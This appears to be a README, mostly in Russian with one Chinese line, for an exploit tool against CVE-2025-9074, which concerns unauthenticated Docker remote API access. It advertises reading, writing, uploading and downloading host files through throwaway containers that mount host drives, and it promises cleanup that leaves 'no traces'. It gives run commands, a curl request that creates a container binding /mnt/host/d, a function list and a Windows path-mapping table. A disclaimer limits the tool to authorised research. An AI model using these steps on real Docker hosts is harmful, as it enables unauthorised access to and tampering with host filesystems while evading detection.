
一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。
Мощный инструмент для эксплуатации удаленного API Docker, предназначенный для исследования безопасности и тестирования уязвимости CVE-2025-9074.
✅ Полностью автоматизированное управление жизненным циклом контейнеров: автоматическое создание временных контейнеров, автоматическая очистка после завершения операций, без следов
✅ Интеллектуальная обработка путей: автоматическое распознавание и преобразование путей Windows в формат монтирования Docker
✅ Полностью автоматизированный рабочий процесс: без необходимости ручного ввода сложных команд, меню-ориентированное взаимодействие, выполнение операций с файлами в один клик
✅ Кроссплатформенная совместимость: идеальная поддержка Windows и Linux
Операции с контейнерами
Управление образами
Операции с файлами на хосте
CVE-2025-9074 — это уязвимость безопасности удаленного API Docker. Злоумышленник может, используя неавторизованный доступ к Docker API:
Установка всех зависимостей с помощью requirements.txt:
pip install -r requirements.txt
Или вручную:
pip install requests docker websocket-client
Запуск скрипта с адресом Docker API по умолчанию:
python CVE-2025-9074-docker-exploit.py
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375
python CVE-2025-9074-docker-exploit.py [опции]
Опции:
-u, --url URL Адрес Docker API (по умолчанию: http://192.168.65.7:2375)
1. Загрузка файла на хост
Введите локальный путь к файлу: /path/to/local/file.txt
Введите целевую директорию на хосте: D:/temp
Введите имя целевого файла (оставьте пустым для сохранения оригинального имени):
2. Скачивание файла с хоста
Введите путь к файлу на хосте: D:/temp/file.txt
Введите локальный путь для сохранения: /tmp
3. Чтение содержимого файла на хосте
Введите путь к файлу на хосте: D:/temp/file.txt
4. Запись файла на хост
Введите целевую директорию на хосте: D:/temp
Введите содержимое файла: Hello, World!
Инструмент автоматически обрабатывает сопоставление путей для Windows Docker Desktop:
| Путь Windows |
|---|
Поддерживаемые форматы ввода:
D:\ или D:/D:\temp или D:/temp"D:\file.txt" (в кавычках)'D:/file.txt' (в кавычках)⚠️ Важное замечание:
Создание контейнера и монтирование диска хоста через Docker API:
curl -X POST "http://<target>:2375/containers/create" \
-H "Content-Type: application/json" \
-d '{
"Image": "python:3.11.7",
"Cmd": ["sleep", "999d"],
"HostConfig": {
"Binds": ["/mnt/host/d:/tmp"]
},
"Tty": true
}'
Чтение и запись файлов на хосте с помощью выполнения команд в контейнере:
# Запись файла
echo "content" > /tmp/file.txt
# Чтение файла
cat /tmp/file.txt
pip install docker websocket-clientpython CVE-2025-9074-docker-exploit.py
CVE-2025-9074-docker-exploit.py
├── Функции управления контейнерами
│ ├── get_containers()
│ ├── display_containers()
│ ├── create_container()
│ ├── stop_container()
│ └── delete_container()
├── Функции управления образами
│ ├── get_images()
│ ├── display_images()
│ ├── pull_image()
│ └── remove_image()
├── Функции работы с файлами на хосте
│ ├── upload_file_to_host()
│ ├── download_file_from_host()
│ ├── read_file_from_host()
│ └── write_file_to_host()
└── Вспомогательные функции
├── normalize_host_path()
├── create_container_with_mount()
├── start_container()
└── stop_and_remove_container()
Приветствуются Issues и Pull Requests!
Данный проект предназначен только для образовательных целей и исследований в области безопасности.
Данный инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Пользователь самостоятельно несёт всю ответственность и риски, связанные с использованием данного инструмента. Автор не несёт ответственности за любое злоупотребление или неавторизованное использование данного инструмента.
| Путь монтирования Docker |
|---|
D:\ | /mnt/host/d |
D:\temp | /mnt/host/d/temp |
C:\Windows | /mnt/host/c/Windows |
C:\Users\test | /mnt/host/c/Users/test |